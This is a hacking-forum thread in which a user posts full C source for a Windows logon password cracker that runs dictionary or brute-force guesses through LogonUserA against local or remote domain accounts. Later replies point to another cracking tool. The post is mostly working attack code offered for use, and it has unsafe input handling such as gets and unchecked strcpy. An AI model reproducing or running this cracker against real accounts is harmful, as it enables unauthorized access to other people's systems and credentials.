Windows password cracker

Have a tool that you think is awesome enough to be promoted by Hackerthreads? Submit it in a thread here. This forum is write-only, like a drop-box, and you will not be able to see other threads.
Post Reply
Jakash3
n00b
Posts: 1
Joined: Tue Aug 28, 2012 12:54 am

Windows password cracker

Post by Jakash3 » Tue Aug 28, 2012 1:00 am

Command line tool for cracking windows passwords using wordlist or bruteforce.

Link with advapi32.lib:

Code: Select all

#include <Windows.h>
#include <conio.h>
#include <cstdio>
#include <cstdlib>
#include <cctype>

void die(const char* format, ...) {
	va_list v;
	va_start(v, format);
	vfprintf(stderr, format, v);
	exit(1);
}

int logon(const char* user, const char* pass, const char* domain, bool showmsg) {
	DWORD ret = 1;
	HANDLE tok;
	char* msg;
	if (!LogonUserA(user,domain,pass,LOGON32_LOGON_NETWORK,LOGON32_PROVIDER_DEFAULT,&tok)) {
		ret = 0;
		if (showmsg) {
			ret = GetLastError();
			FormatMessageA(
				FORMAT_MESSAGE_ALLOCATE_BUFFER | 
				FORMAT_MESSAGE_FROM_SYSTEM |
				FORMAT_MESSAGE_IGNORE_INSERTS,
				NULL,
				ret,
				NULL,
				(char*)&msg,
				0, NULL
			);
			puts(msg);
			LocalFree(msg);
		}
	} else { if (showmsg) puts("Success!"); }
	CloseHandle(tok);
	return ret;
}

void prompt() {
	char *domain, *user, *pass, *input;
	domain = (char*)malloc(256);
	user = (char*)malloc(256);
	pass = (char*)malloc(256);
	input = (char*)malloc(256);
	domain[0] = '.';
	domain[1] = 0;
	for (;;) {
		fputs("-", stdout);
		gets(input);
		switch (input[0]) {
		case '?':
			puts(
				"Interactive mode commands:\n"
				"d DOMAIN    Set domain (Use  \".\" for local machine)\n"
				"u USER      Set username\n"
				"p PASS      Set password\n"
				"x           Attempt logon\n"
				"q           Quit\n"
			);
			break;
		case 'd': strcpy(domain, input + 2); break;
		case 'u': strcpy(user, input + 2); break;
		case 'p': strcpy(pass, input + 2); break;
		case 'x': logon(user, pass, domain, true); break;
		case 'q': free(domain); free(user); free(pass); free(input); return;
		default: puts("Unknown command\n");
		}
	}
}

struct pass_type {
	bool lcase;
	bool ucase;
	bool digit;
	bool punct;
	bool space;
};

void brute(const char* user, struct pass_type * ptype, const char* domain) {
	char i;
	int j = 0, k;
	char * chrs, * pass;
	bool carry;
	chrs = (char*)malloc(100);
	pass = (char*)malloc(256);
	if (ptype->lcase) for (i = 'a'; i <= 'z'; i++, j++) chrs[j] = i;
	if (ptype->digit) for (i = '0'; i <= '9'; i++, j++) chrs[j] = i;
	if (ptype->space) chrs[j++] = ' ';
	if (ptype->ucase) for (i = 'A'; i <= 'Z'; i++, j++) chrs[j] = i;
	if (ptype->punct) for (i = 0x21; i < 0x7f; i++) if (ispunct(i)) chrs[j++] = i;
	for (k = 0; chrs[k]; k++); k--;
	chrs[j] = 0;
	pass[0] = chrs[0];
	pass[1] = 0;
	puts("Press Enter anytime to stop. . .");
	Sleep(1000);
	for (puts(pass); !logon(user, pass, domain, false); puts(pass)) {
		if (_kbhit()) if (_getch() == '\r') {
			free(chrs);
			free(pass);
			puts("\nStopped.");
			return;
		}
		i = 0;
		do {
			if (pass[i] == chrs[k]) {
				carry = true;
				pass[i] = chrs[0];
			} else {
				carry = false;
				pass[i] = *(strchr(chrs, pass[i]) + 1);
				break;
			}
		} while (pass[++i]);
		if (carry) {
			j = strlen(pass);
			pass[j] = chrs[0];
			pass[++j] = 0;
		}
	}
	puts("\nSuccess!");
	return;
}

int main(int argc, char ** argv) {
	if (argc == 1)
		die(
			"wlpc - by Jakash3\n"
			"Windows Logon Password Cracker\n"
			"Usage: %s [username [-w wordfile | -b [-l -u -d -p -s]] [-d domain]] | -i \n\n"
			"-w wordfile  Dictionary attack. Using file containing line by line passwords\n"
			"-b           Bruteforce attack using one or more of the following switches:\n"
			"   -l           Include lowercase alphabetical characters.\n"
			"   -u           Include uppercase alphabetical characters.\n"
			"   -n           Include digit characters\n"
			"   -p           Include punctuation characters\n"
			"   -s           Include space\n"
			"username   Name of user account to try logging in as\n"
			"-d domain  Optional. Remote Domain or server holding the user account\n"
			"-i         Interactive mode\n", argv[0]
		);
	if (argc == 2 && !strcmp(argv[1], "-i")) { prompt(); return 0; }
	FILE* f;
	char *pass, *domain = ".", *wfile;
	bool bf = false;
	struct pass_type p;
	memset(&p, 0, sizeof(struct pass_type));
	int i;
	for (i = 1; i < argc; i++) {
		if (!strcmp(argv[i], "-d")) domain = argv[++i];
		else if (!strcmp(argv[i], "-i")) { prompt(); return 0; }
		else if (!strcmp(argv[i], "-w")) wfile = argv[++i];
		else if (!strcmp(argv[i], "-b")) bf = true;
		else if (!strcmp(argv[i], "-l")) p.lcase = true;
		else if (!strcmp(argv[i], "-u")) p.ucase = true;
		else if (!strcmp(argv[i], "-n")) p.digit = true;
		else if (!strcmp(argv[i], "-p")) p.punct = true;
		else if (!strcmp(argv[i], "-s")) p.space = true;
	}
	if (bf) { brute(argv[1], &p, domain); return 0; }
	pass = (char*)malloc(256);
	if (!(f = fopen(wfile, "r"))) die("Failed to open %s\n", wfile);
	pass = (char*)malloc(256);
	puts("Press Enter anytime to stop. . .");
	Sleep(1000);
	while (!feof(f)) {
		if (_kbhit())
			if (_getch() == '\r') {
				fclose(f);
				free(pass);
				puts("\nStopped.");
				return 0;
			}
		if (!fgets(pass, 256, f)) break;
		*strpbrk(pass, "\r\n") = 0;
		puts(pass);
		if (logon(argv[1], pass, domain, false)) {
			puts("\nSuccess!");
			fclose(f);
			free(pass);
			return 0;
		}
	}
	puts("\nEnd of file!");
	fclose(f);
	free(pass);
	return 0;
}

Grincheux
n00b
Posts: 8
Joined: Mon Jun 29, 2015 12:00 pm

Re: Windows password cracker

Post by Grincheux » Sat Jul 04, 2015 2:31 pm

I wrote my own. http://www.phrio.biz/mediawiki/Cracker_V2
Try it is free.

User avatar
Cool_Fire
Not a sandwich
Posts: 1888
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d
Contact:

Re: Windows password cracker

Post by Cool_Fire » Mon Jul 06, 2015 9:57 am

Grincheux wrote:I wrote my own. http://www.phrio.biz/mediawiki/Cracker_V2
Try it is free.
Could you make source available in a non-executable format? That way people who are a little hesitant to download and run arbitrary executables can download and compile the source.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.

Grincheux
n00b
Posts: 8
Joined: Mon Jun 29, 2015 12:00 pm

Re: Windows password cracker

Post by Grincheux » Mon Jul 06, 2015 2:12 pm

Source is available at here in 7zip format :razz:

Post Reply